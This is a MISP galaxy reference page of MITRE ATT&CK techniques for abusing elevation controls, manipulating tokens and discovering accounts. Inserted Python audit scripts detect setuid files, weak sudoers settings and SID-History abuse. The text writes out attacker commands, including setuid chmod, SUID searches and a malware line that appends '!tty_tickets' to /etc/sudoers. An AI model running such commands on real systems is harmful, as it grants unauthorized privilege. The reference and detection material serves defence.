Tidal Technique

Tidal Technique Cluster

Authors and/or Contributors: Tidal Cyber

Bypass User Account Control

Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[TechNet How UAC Works]

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box.[TechNet Inside UAC][MSDN COM Elevation] An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[Davidson Windows]

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods[Github UACMe] that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.[SANS UAC Bypass]

Internal MISP references

UUID 5e1499a1-f1ad-4929-84e1-5d33c371c02d which can be used as unique global reference for Bypass User Account Control in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.002

Elevated Execution with Prompt

Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.[AppleDocs AuthorizationExecuteWithPrivileges] The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.[Death by 1000 installers; it's all broken!][Carbon Black Shlayer Feb 2019][OSX Coldroot RAT] This technique may be combined with Masquerading to trick the user into granting escalated privileges to malicious code.[Death by 1000 installers; it's all broken!][Carbon Black Shlayer Feb 2019] This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.[Death by 1000 installers; it's all broken!]

Internal MISP references

UUID fd6b86c5-535b-4532-a6d8-a57a6fb04c18 which can be used as unique global reference for Elevated Execution with Prompt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.004

Setuid and Setgid

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.[setuid man page] Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. Linux and Mac File and Directory Permissions Modification). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.

Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.[OSX Keydnap malware] This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.

Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. File and Directory Discovery). The setuid and setgid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.[GTFOBins Suid]
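The defensive counterpart of the ls -l / find checks above is a periodic audit that compares the set of setuid/setgid files against a known-good baseline and reports anything new. The following is an added example (not code from the MISP galaxy or from MITRE): it parses the permission field of constructed ls -l lines, decodes the "s"/"S" markers in the user- and group-execute positions, and flags files outside a constructed baseline allow-list. A live os.stat-based scanner is included for use on a real host.

```python
"""Audit for unexpected setuid/setgid binaries (added example, not the page's code)."""
import os
import stat

# Constructed sample of `ls -l` output; paths, sizes and the baseline are assumptions.
SAMPLE_LS_OUTPUT = """\
-rwsr-xr-x 1 root root   68208 /usr/bin/passwd
-rwxr-sr-x 1 root shadow 43008 /usr/bin/chage
-rwxr-xr-x 1 root root  138208 /usr/bin/grep
-rwsr-sr-x 1 root root   16784 /tmp/.cache/helper
-rwSr--r-- 1 root root       0 /home/user/marker
"""

# Baseline of setuid/setgid files expected on the golden image (constructed).
BASELINE = {"/usr/bin/passwd", "/usr/bin/chage"}


def parse_symbolic_mode(mode: str) -> dict:
    """Decode the special bits from a 10-character symbolic mode like '-rwsr-xr-x'.

    Position 3 (user execute) reads 's' or 'S' when setuid is set, position 6
    (group execute) reads 's' or 'S' when setgid is set. Lowercase means the
    execute bit is also set; uppercase 'S' means the special bit is set without
    execute, which is unusual and worth a closer look.
    """
    if len(mode) != 10:
        raise ValueError(f"bad mode string: {mode!r}")
    return {
        "setuid": mode[3] in "sS",
        "setgid": mode[6] in "sS",
        "setuid_no_exec": mode[3] == "S",
        "setgid_no_exec": mode[6] == "S",
    }


def audit_ls_output(ls_text: str, baseline: set) -> list:
    """Return (path, reason) pairs for setuid/setgid files that are not in the baseline."""
    findings = []
    for line in ls_text.splitlines():
        fields = line.split()
        if len(fields) < 6:          # skip blank or malformed lines
            continue
        mode, path = fields[0], fields[-1]
        bits = parse_symbolic_mode(mode)
        if not (bits["setuid"] or bits["setgid"]) or path in baseline:
            continue
        reason = "setuid" if bits["setuid"] else "setgid"
        if bits["setuid"] and bits["setgid"]:
            reason = "setuid+setgid"
        if bits["setuid_no_exec"] or bits["setgid_no_exec"]:
            reason += " (special bit without execute)"
        findings.append((path, reason))
    return findings


def scan_filesystem(root: str) -> list:
    """Live equivalent of `find / -perm ...`: regular files under root with S_ISUID or S_ISGID."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(full)
    return hits


if __name__ == "__main__":
    for path, reason in audit_ls_output(SAMPLE_LS_OUTPUT, BASELINE):
        print(f"{reason:40} {path}")
```

Run on the sample, the audit reports the helper under /tmp (setuid and setgid, not on the baseline) and the marker file whose setuid bit is set without execute; the two baseline binaries are silent. On a real host, feed scan_filesystem("/") into the same baseline comparison.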

Internal MISP references

UUID e939bc27-a2cc-4278-be9b-a794c34aacbc which can be used as unique global reference for Setuid and Setgid in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.001

Sudo and Sudo Caching

Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and macOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."[sudo man page 2018] Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.[OSX.Dok Malware] Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additionally, if tty_tickets is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo 'Defaults !tty_tickets' >> /etc/sudoers.[cybereason osx proton] In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.
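The weak settings described in this section (NOPASSWD entries, a disabled tty_tickets option, a long or infinite timestamp_timeout) are all visible in the sudoers text itself, so a configuration audit can catch them before, or after, something like the Proton change above lands. The following is an added example, not code from the page or from the sudo project: it parses a constructed sudoers sample, handling comments, negated and scoped Defaults options, and reports findings with a severity. It reads text rather than /etc/sudoers directly so it runs anywhere; on a host, pass it the file contents (or the output of visudo -c -f checks you already collect).

```python
"""Audit sudoers content for caching and NOPASSWD weaknesses (added example)."""
import re

# Constructed sudoers sample; the users and commands are assumptions.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
Defaults        timestamp_timeout=60
Defaults        !tty_tickets
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
user1   ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
"""

NOPASSWD_RE = re.compile(r"\bNOPASSWD:", re.IGNORECASE)


def _strip_comments(text: str):
    """Yield non-empty lines with '#' comments removed.

    Note: '#include'/'#includedir' directives are dropped too; include files
    must be audited separately.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line


def parse_defaults(line: str) -> dict:
    """Parse 'Defaults  a, !b, c=5' into {'a': True, 'b': False, 'c': '5'}.

    Scoped forms ('Defaults:user1 ...', 'Defaults@host ...', 'Defaults>runas ...')
    are accepted; the scope is dropped, so a scoped weakening is treated as
    global, which errs on the side of reporting.
    """
    opts = {}
    body = line[len("Defaults"):].strip()
    if body.startswith((":", "@", ">")) and " " in body:
        body = body.split(None, 1)[1]
    for item in body.split(","):
        item = item.strip()
        if not item:
            continue
        if "=" in item:
            key, value = item.split("=", 1)
            opts[key.strip()] = value.strip().strip('"')
        elif item.startswith("!"):
            opts[item[1:]] = False
        else:
            opts[item] = True
    return opts


def audit_sudoers(text: str) -> list:
    """Return (severity, message) findings for the constructs this section describes."""
    findings = []
    defaults = {}
    for line in _strip_comments(text):
        if line.startswith("Defaults"):
            defaults.update(parse_defaults(line))
        elif NOPASSWD_RE.search(line):
            user = line.split()[0]
            allowed = NOPASSWD_RE.split(line, 1)[1].strip()
            severity = "high" if allowed == "ALL" else "medium"
            findings.append((severity, f"{user} may run {allowed!r} without a password"))
    if defaults.get("tty_tickets") is False:
        findings.append(("high", "tty_tickets disabled: a cached sudo ticket is valid from any tty"))
    timeout = defaults.get("timestamp_timeout")
    if timeout is not None:
        try:
            minutes = float(timeout)
        except ValueError:
            minutes = None
        # A negative timeout means the ticket never expires; the stock default is 5 minutes.
        if minutes is not None and (minutes < 0 or minutes > 15):
            why = "never expires" if minutes < 0 else "exceeds the 5-minute default"
            findings.append(("medium", f"timestamp_timeout={timeout}: cached sudo ticket {why}"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity}] {message}")
```

Against the sample this reports four findings: the two NOPASSWD entries (the unrestricted one rated high), the disabled tty_tickets, and the 60-minute ticket lifetime. A clean file such as "Defaults env_reset" plus the root entry produces none.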

Internal MISP references

UUID e082687f-d403-4246-987b-ad5f12911e4b which can be used as unique global reference for Sudo and Sudo Caching in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.003

Temporary Elevated Cloud Access

Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.[Google Cloud Just in Time Access 2023][Azure Just in Time Access 2023]

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.[Google Cloud Service Account Authentication Roles] In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.[Microsoft Impersonation and EWS in Exchange]

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.[AWS PassRole][Google Cloud Service Account Authentication Roles]

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.[Rhino Google Cloud Privilege Escalation][Rhino Security Labs AWS Privilege Escalation]

Note: this technique is distinct from Additional Cloud Roles, which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control Additional Cloud Roles that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.[CrowdStrike StellarParticle January 2022]

Internal MISP references

UUID 448dc009-2d3f-5480-aba3-0d80dc4336cd which can be used as unique global reference for Temporary Elevated Cloud Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.005

Abuse Elevation Control Mechanism

Adversaries may circumvent mechanisms designed to control elevated privileges in order to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit the privileged actions a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

Internal MISP references

UUID ac7d9875-d18b-48f6-93e6-47c565f9526b which can be used as unique global reference for Abuse Elevation Control Mechanism in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'Windows']
source MITRE

Create Process with Token

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.[Microsoft RunAs]

Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via Token Impersonation/Theft or created via Make and Impersonate Token before being used to create a process.

While this technique is distinct from Token Impersonation/Theft, the techniques can be used in conjunction where a token is duplicated and then used to create a new process.

Internal MISP references

UUID ef0e0599-6543-499d-8409-ef449da5c38a which can be used as unique global reference for Create Process with Token in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.002

Make and Impersonate Token

Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.

This behavior is distinct from Token Impersonation/Theft in that this refers to creating a new user token instead of stealing or duplicating an existing one.

Internal MISP references

UUID 561da0ae-4ebc-4356-a954-338249cac31a which can be used as unique global reference for Make and Impersonate Token in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.003

Parent PID Spoofing

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.[DidierStevens SelectMyParent Nov 2009] This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.[Microsoft UAC Nov 2018]

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.[CounterCept PPID Spoofing Dec 2018] This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.[CTD PPID Spoofing Macro Mar 2019][CounterCept PPID Spoofing Dec 2018]

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.[XPNSec PPID Nov 2017]

Internal MISP references

UUID 449abc18-9faf-4ea6-a420-34528c28301d which can be used as unique global reference for Parent PID Spoofing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.004

SID-History Injection

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. [Microsoft SID] An account can hold additional SIDs in the SID-History Active Directory attribute [Microsoft SID-History Attribute], allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values [Microsoft Well Known SIDs Jun 2017] may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.
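Because every SID in SID-History is added to the account's access token, a defender's audit of that attribute is cheap and effective. Two checks follow directly from the description above: a SID-History entry whose domain identifier equals the account's own domain cannot be a migration artifact (migrations bring SIDs from a foreign domain), and an entry carrying a well-known privileged RID (Administrator 500, Domain Admins 512, Schema Admins 518, Enterprise Admins 519) deserves review even when it is cross-domain. The following is an added example, not code from the page or from Microsoft; the account records and domain SIDs are constructed, shaped like an LDAP or Get-ADUser export.

```python
"""Flag suspicious sIDHistory values on directory accounts (added example)."""
import re

# Domain SIDs have the form S-1-5-21-<a>-<b>-<c>-<RID>; the first three numbers identify the domain.
SID_RE = re.compile(r"^S-1-5-21-(\d+)-(\d+)-(\d+)-(\d+)$")

# Well-known privileged RIDs (relative identifiers) within any domain.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Constructed sample: domain 111-222-333 is "ours", 999-888-777 is a migrated-from domain.
SAMPLE_ACCOUNTS = [
    {"sam": "alice", "objectSid": "S-1-5-21-111-222-333-1105",
     "sIDHistory": ["S-1-5-21-999-888-777-1105"]},          # normal migration
    {"sam": "svc-backup", "objectSid": "S-1-5-21-111-222-333-1201",
     "sIDHistory": ["S-1-5-21-111-222-333-512"]},           # same-domain Domain Admins SID
    {"sam": "bob", "objectSid": "S-1-5-21-111-222-333-1300",
     "sIDHistory": ["S-1-5-21-999-888-777-519"]},           # foreign Enterprise Admins SID
    {"sam": "carol", "objectSid": "S-1-5-21-111-222-333-1400",
     "sIDHistory": []},
]


def split_sid(sid: str):
    """Return (domain_identifier, rid) for an S-1-5-21-... SID, or None if it is not one."""
    m = SID_RE.match(sid)
    if not m:
        return None
    a, b, c, rid = m.groups()
    return (f"S-1-5-21-{a}-{b}-{c}", int(rid))


def audit_sid_history(accounts) -> list:
    """Return (account, sid, reason) triples for SID-History entries worth reviewing."""
    findings = []
    for acct in accounts:
        own = split_sid(acct["objectSid"])
        for hist in acct.get("sIDHistory", []):
            parsed = split_sid(hist)
            if parsed is None:
                findings.append((acct["sam"], hist, "unparsed SID in sIDHistory"))
                continue
            domain, rid = parsed
            if own is not None and domain == own[0]:
                findings.append((acct["sam"], hist,
                                 "same-domain SID in sIDHistory (not a migration artifact)"))
            if rid in PRIVILEGED_RIDS:
                findings.append((acct["sam"], hist,
                                 f"privileged RID {rid} ({PRIVILEGED_RIDS[rid]}) in sIDHistory"))
    return findings


if __name__ == "__main__":
    for sam, sid, reason in audit_sid_history(SAMPLE_ACCOUNTS):
        print(f"{sam:12} {sid:32} {reason}")
```

On the sample, alice's cross-domain, unprivileged entry is accepted, svc-backup produces two findings (same-domain and Domain Admins RID), and bob one (Enterprise Admins RID from the foreign domain). Populate the account list from the directory (for example, the objectSid and sIDHistory attributes of every user and computer) and run it on a schedule.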

Internal MISP references

UUID dcb323f0-0fe6-4e26-9039-4f26f10cd3a5 which can be used as unique global reference for SID-History Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.005

Token Impersonation/Theft

Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using DuplicateToken or DuplicateTokenEx. The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.

An adversary may perform Token Impersonation/Theft when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally Create Process with Token using CreateProcessWithTokenW or CreateProcessAsUserW. Token Impersonation/Theft is also distinct from Make and Impersonate Token in that it refers to duplicating an existing token, rather than creating a new one.

Internal MISP references

UUID ab823cbf-0238-4347-a191-a90d84b978f7 which can be used as unique global reference for Token Impersonation/Theft in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.001

Access Token Manipulation

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These tokens can then be applied to an existing process (i.e. Token Impersonation/Theft) or used to spawn a new process (i.e. Create Process with Token). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[Pentestlab Token Manipulation]

Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

Internal MISP references

UUID 1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041 which can be used as unique global reference for Access Token Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE

Account Access Removal

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a System Shutdown/Reboot to set malicious changes into place.[CarbonBlack LockerGoga 2019][Unit42 LockerGoga 2019]

In Windows, Net utility, Set-LocalUser and Set-ADAccountPassword PowerShell cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as Data Destruction and Defacement, in order to impede incident response/recovery before completing the Data Encrypted for Impact objective.

Internal MISP references

UUID 847fcc8a-e74d-41e2-9f05-8d79d990cc04 which can be used as unique global reference for Account Access Removal in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE

Cloud Account - Duplicate

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.[Microsoft msolrolemember][GitHub Raindance] The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.[Microsoft AZ CLI][Black Hills Red Teaming MS AD Azure, 2018]

The AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.[AWS List Roles][AWS List Users] In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.[Google Cloud - IAM Servie Accounts List API]

Internal MISP references

UUID d76c3dde-dba5-4748-8d51-c93fc34f885e which can be used as unique global reference for Cloud Account - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.004

Domain Account - Duplicate

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as net user /domain and net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. PowerShell cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.

Internal MISP references

UUID 12908bde-a5eb-40a5-ae27-d93960d0bfdc which can be used as unique global reference for Domain Account - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.002

Email Account

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).[Microsoft Exchange Address Lists]

In on-premises Exchange and Exchange Online, the Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.[Microsoft getglobaladdresslist][Black Hills Attacking Exchange MailSniper, 2016]

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.[Google Workspace Global Access List]

Internal MISP references

UUID b31b014b-0b59-4493-966b-a57ad68f073d which can be used as unique global reference for Email Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.003

Local Account - Duplicate

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as net user and net localgroup of the Net utility and id and groups on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.

Internal MISP references

UUID df5f6835-ca0a-4ef5-bb3a-b011e4025545 which can be used as unique global reference for Local Account - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.001

Account Discovery

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

For example, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default PowerShell and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

Internal MISP references

UUID 6736995e-b9ea-401b-81fa-6caeb7a17ce3 which can be used as unique global reference for Account Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE

Additional Cloud Credentials

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.[Microsoft SolarWinds Customer Guidance][Blue Cloud of Death][Blue Cloud of Death Video] These credentials include both x509 keys and passwords.[Microsoft SolarWinds Customer Guidance] With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.[Demystifying Azure AD Service Principals]

In infrastructure-as-a-service (IaaS) environments, after gaining access through Cloud Accounts, adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.[GCP SSH Key Add] This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.[Expel IO Evil in AWS][Expel Behind the Scenes]

Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. Cloud Accounts).[Rhino Security Labs AWS Privilege Escalation][Sysdig ScarletEel 2.0] For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.[SpecterOps Azure Privilege Escalation]

In AWS environments, adversaries with the appropriate permissions may also use the sts:GetFederationToken API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. [Crowdstrike AWS User Federation Persistence]

Internal MISP references

UUID 0799f2ee-3a83-452e-9fa9-83e91d83be25 which can be used as unique global reference for Additional Cloud Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.001
Related clusters

To see the related clusters, click here.

Additional Cloud Roles

